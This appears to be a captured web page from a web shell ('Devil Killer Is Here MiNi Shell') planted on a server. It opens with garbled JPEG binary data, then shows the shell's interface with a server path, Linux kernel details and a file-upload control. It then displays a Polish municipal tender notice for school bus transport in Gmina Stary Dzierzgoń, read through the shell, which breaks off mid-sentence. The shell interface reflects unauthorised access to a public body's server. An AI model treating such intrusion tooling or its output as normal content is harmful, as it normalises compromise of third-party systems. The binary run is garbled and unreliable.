JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220630/0023197101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz dzieci z terenu Gminy Stary Dzierzgoń do placówek oświatowych w roku szkolnym 2022/2023” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stary Dzierzgoń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170748100</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stary Dzierzgoń 71</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stary Dzierzgoń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">55 276 14 81</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@starydzierzgon.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://ug.starydzierzgon.samorzady.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz dzieci z terenu Gminy Stary Dzierzgoń do placówek oświatowych w roku szkolnym 2022/2023” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a78bfc34-f84a-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00231971</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024562/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.17 Dowozy dzieci z terenu Gminy Stary Dzierzgoń do placówek oświatowych w roku szkolnym 2022/2023. &#34;Dowóz uczniów do szkół i przedszkola na terenie Gminy Stary Dzierzgoń oraz odwóz po zak. lekcjach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://ug.starydzierzgon.samorzady.pl/ ; https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami (składanie<br/>oświadczeń,dokumentów, zawiadomień oraz przekazywanie informacji) odbywa się przy użyciu środków komunikacji elektronicznej pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, oraz poczty elektronicznej. Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej email: urzad@starydzierzgon.pl (nie dotyczy składania, zmiany i wycofania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne,<br/>wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/ oraz Regulaminie ePUAP. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. Właściciel platformy ePUAP może narzucić inne wymagania w zakresie korzystania z usług. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>2. Administratorem danych osobowych jest Gmina Stary Dzierzgoń, Stary Dzierzgoń 71, 82-450 Stay Dzierzgoń. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, <br/>a także ustawa o narodowym zasobie archiwalnym i archiwach.<br/>3.	Inspektorem ochrony danych osobowych w Gminie Stary Dzierzgoń jest Pan Dariusz Klimowski, e-mail: IOD@fioi.org, tel. 552394874, adres Kancelarii IOD: 82-300 Elbląg, <br/>ul. Zofii Nałkowskiej 21.<br/>4.	Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu: <br/>a)	przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b)	zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c)	dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d)	przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e)	udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f)	archiwizacji postępowania.<br/>5.	Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>6.	Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>7.	Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO: <br/>a)	prawo dostępu do danych (art. 15), <br/>b)	prawo sprostowania danych (art. 16),<br/>c)	prawo do usunięcia danych (art. 17),<br/>d)	prawo do ograniczenia przetwarzania danych (art. 18), <br/>e)	prawo wniesienia skargi do organu nadzorczego.<br/>8.	Osobie, której dane dotyczą nie przysługuje:<br/>a)	prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; <br/>w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia RODO,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c)	prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO, <br/>9.	Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>10. Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>11. Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in. z art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane dotyczą nie przysługuje:<br/>a) prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia RODO,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Rg.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Cześć nr 1: Dowóz uczniów do szkół i przedszkola na terenie Gminy Stary Dzierzgoń i odwóz po zakończonych lekcjach:<br/>a)	Szkoły Podstawowej w Myślicach, Myślice 16, 82-450 Stary Dzierzgoń (z II oddziałami przedszkolnymi):<br/>- dowóz i odwóz z miejscowości: Pronie, Lubochowo, Milikowo, Lipiec, Pudłowiec, Gisiel, Latkowo, Skolwity, Kornele, Tabory, Myślice Kolonia ;<br/>- przewidywana liczba uczniów z klasy I-VIII szkoły podstawowej do przewozu: 91<br/>w tym: Pronie - 10, Lubochowo - 24, Milikowo - 2, Lipiec - 7, Pudłowiec - 6, <br/>Gisiel - 21, Latkowo - 4, Skolwity - 0, Kornele - 3, Tabory – 10, Myślice Kolonia - 4;<br/>- przewidywana liczba dzieci uczęszczających do oddziałów przedszkolnych w szkole podstawowej do przewozu: 24 (4-letnie - 5, 5-letnie – 8, 6-letnie – 11) w tym: <br/>Pronie - 3, Lubochowo - 4, Milikowo - 3, Lipiec - 1, Pudłowiec - 0, Gisiel - 1, <br/>Latkowo - 0, Skolwity - 2, Kornele - 3, Tabory – 2, Myślice Kolonia - 5;<br/>b)	Szkoły Podstawowej w Starym Dzierzgoniu, Stary Dzierzgoń 4, 82 – 450 Stary Dzierzgoń:<br/>- dowóz i odwóz z miejscowości: Bucznik, Bądze, Mortąg, Zakręty, Monasterzysko Wielkie, Wartule, Matule, Górki, Piaski Morąskie, Kielmy, Protajny, Przezmark, Folwark, Nowy Folwark, Stare Miasto, Stary Dzierzgoń Kolonia; <br/>- przewidywana liczba dzieci do przewozu: 99 w tym z: Bucznik - 1, Bądze - 3, Mortąg - 11, Zakręty - 5, Monasterzysko Wielkie - 7, Wartule - 0, Matule - 4, <br/>Górki - 7, Piaski Morąskie - 2, Kielmy - 13, Protajny - 2, Przezmark - 12, Folwark- 16, Nowy Folwark - 11, Stare Miasto – 5, Stary Dzierzgoń Kolonia – 0; <br/>c)	Przedszkola Samorządowego &#34;NIEZAPOMINAJKA&#34; w Starym Mieście, Stare Miasto 73, 82-450 Stary Dzierzgoń:<br/>- dowóz i odwóz z miejscowości: Bucznik, Bądze, Mortąg, Zakręty, Monasterzysko Wielkie, Wartule, Matule, Górki, Piaski Morąskie, Kielmy, Przezmark, Folwark, Nowy Folwark, Stary Dzierzgoń;<br/>- przewidywana liczba dzieci do przewozu: 28 (4-letnie - 5, 5-letnie – 8, 6-letnie– 15) <br/>w tym: Bucznik – 0, Bądze - 1, Mortąg - 2, Zakręty - 2, Monasterzysko Wielkie - 5, Wartule – 0, Matule - 2, Górki - 1, Piaski Morąskie - 0, Kielmy - 3, Przezmark - 3, Folwark - 2, Nowy Folwark – 3, Stary Dzierzgoń – 4.<br/>1)	Wykonawca zobowiązany jest do zapewnienia opieki nad dziećmi dowożonymi w autobusach w czasie trwania przewozu z wyznaczonego przystanku w miejscu zamieszkania do szkoły i ze szkoły do wyznaczonego przystanku w miejscu zamieszkania;<br/>2)	Wykonawca zobowiązany jest do zapewnienia opieki nad dziećmi podczas wsiadania do autobusu i wysiadania z autobusu;<br/>3)	Linie komunikacji muszą być ułożone przez Wykonawcę i oznaczone w taki sposób, aby umożliwiały dzieciom, w dni nauki szkolnej, dojazd z wyznaczonego przystanku w miejscu zamieszkania do szkoły, oraz ze szkoły do przystanku w miejscu zamieszkania. Czas przejazdu pomiędzy miejscem zamieszkania dziecka a szkołą/placówką oświatową nie może przekroczyć 1 godziny;<br/>4)	Wykonawca zaplanuje harmonogram przywozu i odwozu do szkół i przedszkoli dzieci z terenu Gminy Stary Dzierzgoń na podstawie przedstawionej informacji;<br/>5)	Wykonawca zapewni rozpoczęcie dowozu dzieci nie wcześniej niż o godzinie 6.40 na planowaną godzinę rozpoczęcia zajęć lekcyjnych w poszczególnych placówkach oświatowych tj. 8.00 oraz powrót z placówek oświatowych: <br/>a)	z Szkoły Podstawowej i oddziału przedszkolnego w Myślicach odwozy:<br/>- od poniedziałku do wtorku po 6 godzinie lekcyjnej od godz. 13.35 i 8 godzinie lekcyjnej od godz. 15.25<br/>- od środy do piątku po 5 godzinie lekcyjnej od godz. 13.05 i 7 godzinie lekcyjnej od godz. 14.30,<br/>b)	z Szkoły Podstawowej w Starym Dzierzgoniu odwozy:<br/>- od poniedziałku do wtorku po 6 godzinie lekcyjnej od godz. 13.45 i 8 godzinie lekcyjnej od godz. 15.25 <br/>- od środy do piątku po 5 godzinie lekcyjnej od godz. 12.45 i 7 godzinie lekcyjnej od godz. 14.30,<br/>c)	z Oddziału Przedszkolnego w Starym Mieście odwozy:<br/>- od poniedziałku do wtorku od godz. 14.00<br/>- od środy do piątku od godziny 13.05<br/>6)	Dowóz i odwóz dzieci uczęszczających do przedszkola „Niezapominajka” w Starym Mieście i oddziału przedszkolnego w Myślicach może odbywać się jednym środkiem transportu podczas dowozu uczniów do Szkół Podstawowych.<br/>7)	Ustalenie ostatecznego rozkładu jazdy Wykonawca dokonuje w porozumieniu z dyrektorami placówek oświatowych. Trasa powinna przebiegać możliwie najkrótszą drogą. Zamawiający zastrzega sobie prawo zmiany obciążeń na poszczególnych liniach.<br/>8)	Zamawiający przewiduje możliwość zmiany liczby dowożonych uczniów.<br/>9)	Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat, a Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej jeżeli wartość zamówienia będzie mniejsza niż szacowana przez Zamawiającego.<br/>10) Kursy winny się odbywać przy zachowaniu norm bezpieczeństwa obowiązujących w zakresie transportu drogowego osób oraz przewozu dzieci szkolnych, a także dostosowaniu liczby kursów, oraz liczby miejsc siedzących pojazdów na poszczególnych kierunkach do ilości przewożonych dzieci.<br/>11) Przewozy dzieci odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach Prawo o ruchu drogowym (tj. Dz. U. z 2022 r. poz. 988 ze zm.) oraz w innych przepisach związanych z przewozem osób, m.in. ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2022 r. poz. 180 ze zm.), również między innymi:<br/>a)	Wykonawca musi zapewnić dzieciom bezpieczny przewóz, tzn. odpowiednie warunki bezpieczeństwa i higieny, w tym miejsca siedzące dla każdego dziecka;<br/>b)	Zamawiający wymaga zapewnienia w pojazdach przewożących dzieci, w okresie niskich temperatur, tj. poniżej 10°C, odpowiedniej temperatury, wynoszącej co najmniej 15°C;<br/>c)	Pojazdy uczestniczące w dowozach muszą odpowiadać ogólnym warunkom przewozu osób, muszą posiadać ważne polisy ubezpieczenia OC i NW oraz aktualne badania techniczne.<br/>12) Zamawiający zastrzega możliwe odstępstwa od przewidywanego przewozu, uzależnione od zmiany planów lekcji, ilości dzieci, likwidacji szkoły, zmiany organizacji roku szkolnego, <br/>w szczególności;<br/>a)	Zmiany w ilości dowożonych dzieci (zmniejszenie lub zwiększenie liczby przewożonych dzieci z poszczególnych miejscowości);<br/>b)	Zmiany w godzinach odjazdów pojazdów ustalone w porozumieniu z dyrektorami placówek oświatowych i Zamawiającym;<br/>c)	W sytuacjach nagłych spowodowanych wypadkami losowymi, taki jak w szczególności potrzeba nagłej ewakuacji szkoły, dopuszcza się powiadomienie telefoniczne.<br/>13) Wykonawca zabezpiecza przewozy na wszystkich liniach w dni nauki szkolnej. Linie będą obsługiwane co najmniej czterema autobusami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość terminu płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć nr 2: Dowóz uczniów zamieszkałych na terenie Gminy Stary Dzierzgoń do Specjalnego Ośrodka Szkolno-Wychowawczego w Barcicach, Barcice 66, 82-420 Ryjewo oraz ich odwóz.<br/>1)	Przedmiotem zamówienia jest świadczenie usług transportowych tj. dowóz i odwóz dzieci do Specjalnego Ośrodka Szkolno-Wychowawczego w Barcicach, Barcice 66, 82-420 Ryjewo, w ramach przewozów zamkniętych. Dowóz dzieci i młodzieży odbywać się będzie pod opieką zatrudnionego przez Wykonawcę opiekuna. Usługa świadczona będzie w roku szkolnym 2022/2023, za wyjątkiem dni ustawowo wolnych od pracy bądź od zajęć lekcyjnych. Dowóz organizowany jest do Specjalnego Ośrodka Szkolno-Wychowawczego w Barcicach:<br/>- dowóz i odwóz z miejscowości: Stary Dzierzgoń ,<br/>- przewidywana liczba dzieci do przewozu: 1 osoba.<br/>1.1. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkoły oraz odwóz uczniów ze szkoły na wyznaczony przystanek w miejscu zamieszkania. Dowóz do Specjalnego Ośrodka Szkolno-Wychowawczego <br/>w Barcicach (dowóz w poniedziałek na godzinę 8.00 lub inny dzień rozpoczynający tydzień nauki, odwóz w piątek lub inny dzień kończący tydzień nauki o godzinie 14.40).<br/>1.2. Do stawki za 1 km przewozu należy wkalkulować trasę najbliższą po drogach publicznych uwzględniając ewentualne objazdy i czasowe utrudnienia drogowe, remonty dróg z powodów nie leżących po stronie Zamawiającego.<br/>1.3. Szacuje się, że w okresie miesiąca dokonywane będzie 8 usług odwozów/dowozów dzieci do SOSW w Barcicach. Wynagrodzenie należne będzie za wykonaną usługę.<br/>1.4. Liczba uczniów dowożonych może ulec zmianie (zwiększeniu lub zmniejszeniu, z przyczyn niezależnych od Zamawiającego). W takim przypadku Wykonawca zobowiązany jest zapewnić środek transportu o liczbie miejsc siedzących nie mniejszej niż liczba dzieci uprawnionych. W przypadku braku uczniów zadanie nie będzie wykonywane.<br/>1.5. W przypadku zmiany planów zajęć w szkole, godziny dowozu oraz odwozu uczniów do placówki mogą ulec zmianie.<br/>1.6. Godziny dowozu powinny być tak skonstruowane, aby umożliwiały punktualne rozpoczęcie zajęć lekcyjnych przez ucznia.<br/>1.7. Do realizacji przedmiotu umowy Wykonawca zapewni:<br/>a)	pojazd własny lub 